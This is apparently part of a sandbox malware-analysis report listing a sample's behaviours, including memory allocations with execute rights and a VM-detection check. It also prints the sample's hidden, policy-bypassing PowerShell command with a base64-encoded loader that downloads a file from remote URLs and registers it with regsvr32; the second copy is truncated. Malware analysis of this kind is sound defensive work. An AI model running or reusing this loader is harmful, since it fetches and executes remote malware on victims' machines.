CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b63d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 18, 2023, 9:25 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 146 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2208 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x742f2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02990000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02642000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02991000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02992000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02643000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02644000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02687000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02685000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02645000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02960000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02646000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02673000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02674000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02676000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02677000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02678000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02679000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a45000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a46000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a47000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a48000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a49000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a4a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a4b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a4c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a4d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a4e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a4f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABmAGwAYQBtAGwAZQBzAHMAIAA9ACAANQA0ADkAOwAkAGcAYQBzAHQAZQByAG8AegBvAG8AaQBkAFYAaQBuAGQAaQBjAGEAdABvAHIAIAA9ACAAIgBBAG0AcAB1AHQAYQB0AGUAZABKAGUAZABjAG8AYwBrACIAOwAkAFQAZQBsAGUAcwBjAG8AcABpAGMAYQBsACAAPQAgACIAUAByAGUAbABhAHQAaQBjAGEAbABuAGUAcwBzAEMAYQBuAGMAZQBsACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABTAHQAcgBhAGkAdABzAG0AZQBuAFIAaABvAG0AYgBvAGgAZQBkAHIAYQBsACAAPQAgADIAMAA2ADsAJABNAG8AcwBrAGUAbgBlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQB2AEEARwAwAEEAYQBRAEIAUwBBAEMAOABBAFkAdwBCAHEAQQBHAGsAQQBUAEEAQgBRAEEASABBAEEAUwBRAEIAVQBBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATABnAEEANQBBAEQARQBBAEwAdwBCAFkAQQBHADQAQQBaAEEAQQB2AEEARgBjAEEAYgB3AEIAdgBBAEUATQBBAGEAZwBCADEAQQBIAG8AQQBTAFEAQgBDAEEARQBRAEEAdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARQA4AEEAVABnAEIAUABBAEUAcwBBAGUAUQBCAHQAQQBIAGcAQQBiAHcAQgB2AEEARwA0AEEAUgBnAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABzAGwAdQBnAGwAaQBrAGUAIABpAG4AIAAkAE0AbwBzAGsAZQBuAGUAZQByACAALQBzAHAAbABpAHQAIAAiAHUAIgApACAAewAkAEQAaQBzAHMAZQB2AGUAcgBzACAAPQAgADYANgAwADsAdAByAHkAIAB7ACQAVwBhAGIAcgBvAG4AVwBvAG8AaQBuAGcAIAA9ACAAIgBNAGkAcwBsAGkAdgBlAGQARABpAHAAbABvAGsAYQByAHkAbwBuACIAOwAkAG8AdQB0AHQAaABvAHUAZwBoAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAEEAQgB5AEEARwA4AEEAYwB3AEIAegBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQQB1AEEASABBAEEAYQBBAEIANQBBAEgATQBBAGEAUQBCAHYAQQBBAD0APQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAVQBBAE0AdwBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQwA0AEEATQBnAEEAdwBBAEQAawBBAEwAZwBBADUAQQBEAFUAQQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgATQBBAGQAQQBCAGwAQQBHADgAQQBjAEEAQgBzAEEARwBFAEEAYwB3AEIAMABBAEcAawBBAFoAUQBCAHoAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAbgB2AHIASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBhAEEAQgBsAEEARwBFAEEAWgBBAEIAbABBAEgASQBBAEwAZwBCAGkAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAQwBoAG8AbgBkAHIAbwBjAGwAYQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBjAEEAQgB2AEEARwB3AEEAZQBRAEIAegBBAEcAVQBBAGMAdwBBAHUAQQBHAE0AQQBhAFEAQgAwAEEASABrAEEAIgA7ACQAUABpAG8AbgBlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBsAHUAZwBsAGkAawBlACkAKQA7AGkAdwByACAAJABQAGkAbwBuAGUAZAAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHYAYQB0AGYAdQBsAFMAeQBzAHQAZQBtAGkAcwBlAHIALgB1AHAAZwBpAHIAZABzAEIAYQBjAGsAbABpAHMAdABzADsAJABmAGEAcwB0AHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE0AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAeABBAEMANABBAE4AUQBBADAAQQBBAD0APQAiADsAJABuAG8AbgB2AGEAYwB1AG8AdQBzAG4AZQBzAHMAVAB1AGMAdQBuAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBOAFEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQARQBBAE8AQQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABnAEEAZAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBOAHcAQQA9AGQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFkAQQBaAFEAQgBzAEEARwA4AEEAZABRAEIAeQBBAEYAUQBBAGEAUQBCAG0AQQBHAFkAQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAdgBBAEEAPQA9ACIAOwAkAHQAdQByAHAAZQBuAHQAaQBuAGkAYwBBAG4AdABpAG0AbwBuAGEAcgBjAGgAYQBsACAAPQAgACIAQgByAGkAZABhAGwAZQByACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdgBhAHQAZgB1AGwAUwB5AHMAdABlAG0AaQBzAGUAcgAuAHUAcABnAGkAcgBkAHMAQgBhAGMAawBsAGkAcwB0AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYANgA1ADIAMwApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAZABnAEIAaABBAEgAUQBBAFoAZwBCADEAQQBHAHcAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAGEAUQBCAHoAQQBHAFUAQQBjAGcAQQB1AEEASABVAEEAYwBBAEIAbgBBAEcAawBBAGMAZwBCAGsAQQBIAE0AQQBRAGcAQgBoAEEARwBNAEEAYQB3AEIAcwBBAEcAawBBAGMAdwBCADAAQQBIAE0AQQBMAEEAQgBFAEEARwB3AEEAYgBBAEIAUwBBAEcAVQBBAFoAdwBCAHAAQQBIAE0AQQBkAEEAQgBsAEEASABJAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBPAHcAQgBCAEEARwA0AEEAWgB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBBAD0APQAiADsAJABpAG0AcABlAHIAZgBvAHIAYQB0AGUAZABSAGUAcABlAG4AdABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAEUAQQBkAFEAQgBwAEEARwBjAEEAYwBnAEIAaABBAEcANABBAGQAUQBCAHMAQQBHAEUAQQBjAGcAQQB1AEEASABBAEEAYgB3AEIAcgBBAEcAVQBBAGMAZwBBAD0ATQBvAGUAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATgB3AEEAMABBAEMANABBAE0AUQBBAHkAQQBEAE0AQQBMAGcAQQB4AEEARABVAEEATQB3AEEAPQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGEAUQBCADAAQQBHAFUAQQBaAGcAQgBzAEEASABrAEEAYQBRAEIAdQBBAEcAYwBBAEwAZwBCAG4AQQBIAEkAQQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFkAUQBCAHcAQQBHAFUAQQBjAGcAQgBpAEEARwA4AEEAZQBRAEIAUQBBAEgASQBBAFoAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEASABRAEEAWQBRAEIAdQBBAEcAVQBBAGIAdwBCADEAQQBIAE0AQQBiAEEAQgA1AEEAQwA0AEEAWQB3AEIAcwBBAEcAOABBAGQAUQBCAGsAQQBBAD0APQAiADsAJABBAGQAcgBvAGkAdABlAHMAdAAgAD0AIAA0ADQAOwBiAHIAZQBhAGsAOwBBAG4AZwB1AGwAYQByADsAfQBBAG4AZwB1AGwAYQByADsAfQAgAGMAYQB0AGMAaAAgAHsAJABSAGUAdgBlAHIAdABlAHIAQgBhAG4AawBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABNAEEATABnAEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQASQBBAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAFEAQQAwAEEARABFAEEATABnAEEAeQBBAEQARQBBAE4AdwBBAD0AIgA7ACQAUwB0AHUAZABmAGkAcwBoAGUAcwBDAGUAcgBpAGEAbABpAGEAIAA9ACAAIgBwAHIAZQBwAG8AbgBkAGUAcgBhAHQAZQAiADsAfQB9ACQAYwBoAG8AbgBkAHIAZQBjAHQAbwBtAHkAIAA9ACAANwA0ADgAOwBBAG4AZwB1AGwAYQByADsA"

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABmAGwAYQBtAGwAZQBzAHMAIAA9ACAANQA0ADkAOwAkAGcAYQBzAHQAZQByAG8AegBvAG8AaQBkAFYAaQBuAGQAaQBjAGEAdABvAHIAIAA9ACAAIgBBAG0AcAB1AHQAYQB0AGUAZABKAGUAZABjAG8AYwBrACIAOwAkAFQAZQBsAGUAcwBjAG8AcABpAGMAYQBsACAAPQAgACIAUAByAGUAbABhAHQAaQBjAGEAbABuAGUAcwBzAEMAYQBuAGMAZQBsACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABTAHQAcgBhAGkAdABzAG0AZQBuAFIAaABvAG0AYgBvAGgAZQBkAHIAYQBsACAAPQAgADIAMAA2ADsAJABNAG8AcwBrAGUAbgBlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQB2AEEARwAwAEEAYQBRAEIAUwBBAEMAOABBAFkAdwBCAHEAQQBHAGsAQQBUAEEAQgBRAEEASABBAEEAUwBRAEIAVQBBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATwBR